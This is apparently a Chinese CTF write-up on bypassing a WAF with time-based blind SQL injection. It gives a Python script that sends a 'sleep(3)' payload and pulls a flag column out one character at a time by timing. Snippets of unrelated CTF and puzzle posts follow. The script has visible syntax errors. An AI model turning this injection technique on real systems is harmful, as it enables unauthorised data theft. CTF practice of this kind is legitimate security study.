上週舉辦的線上ctf,因為想總結一些sql注入,就把這道題拿出來回憶一下,可能記憶會有誤差。
給了原始碼和flag所在位置,明顯考的是繞過waf,先測試過濾了以下waf:
select、、=、information、union、
該題沒有任何回顯,所以只能使用時間盲注。不過由於給出了flag所在位置,不需要查詢資料庫名、表名、列名等資訊,只需要查詢表flllllllag
中列fl4g
的資料即可。
解題時寫的盲注指令碼,本來想優化一下,由於沒有復現環境,只好直接貼上了。
import requests
import string
url1 = ''
content_str = string.letters + string.digits +'{}-_'
def judge_response(payload):
headers =
url = url1 + payload
#print(url)
try:
response = requests.get(url=url, headers=headers, timeout=0.5)
#print(response.text)
return true
except:
#print('other error')
return false
def content_value(name):
content = ''
for i in range(1, 50):
for index in content_str:
payload = ' or (ascii(mid({},{},1))-{}) and sleep(3)'.format(name, i, ord(index))
response = judge_response(payload)
if response:
content += index
print(content)
else:
pass
return content
if __name__=='__main__':
fl4g = content_value('fl4g')
print(fl4g)
該指令碼的判斷處應該使用if
進行優化一下,(我沒使用if
忘記了是不是被過濾了) 2020高校戰「疫」網路安全分享賽MISC題分析
分析環境 kali 2020 取證工具 volatility 分析工具 binwalk foremost 這裡就到了usb記憶體取證分析的環節 1.先用binwalk看看這個檔案有個了解 2.開始取證分析 2.1 獲取 profile的引數以便於我們接下來的繼續取證分析 使用imageinfo外掛程...
百度杯2023年春秋歡樂賽 象棋
象棋 題目可以在i春秋的ctf訓練營裡找到 開啟題目鏈結還真的給了乙個象棋遊戲,我一高興還玩了兩把.進入正題,題目中並沒有給出提示資訊,審查元素看看,發現了乙個好東西 看到這個正規表示式就知道接下來要寫 爆破檔名了,正好昨天剛學了多執行緒,今天正好拿來練習 import requests impor...
藍橋杯2023年真題 解密
本題總分 5 分 問題描述 下表給出了字元變換的規則 例如,將字串 yeri 加密可得字串 eafn。小明有乙個隨機的字串,加密後為 eafnjisplhfvidhwfbejrjfibbkryy 由 30 個大小寫英文本母組成,不包含換行符 請問原字串是多少?如果你把以上字串和 複製到文字檔案中,請...